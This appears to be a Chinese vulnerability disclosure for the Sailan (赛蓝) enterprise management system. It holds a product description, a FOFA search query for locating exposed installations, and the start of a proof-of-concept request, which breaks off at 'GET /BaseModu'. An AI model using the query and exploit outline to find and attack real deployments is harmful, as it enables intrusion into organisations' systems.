影响范围
赛蓝企业管理系统
漏洞概述
赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平
资产测绘
FOFA检索:
body="www.cailsoft.com" || body="赛蓝企业管理系统"
漏洞复现
应用界面如下所示:
漏洞POC如下所示:
GET /BaseModu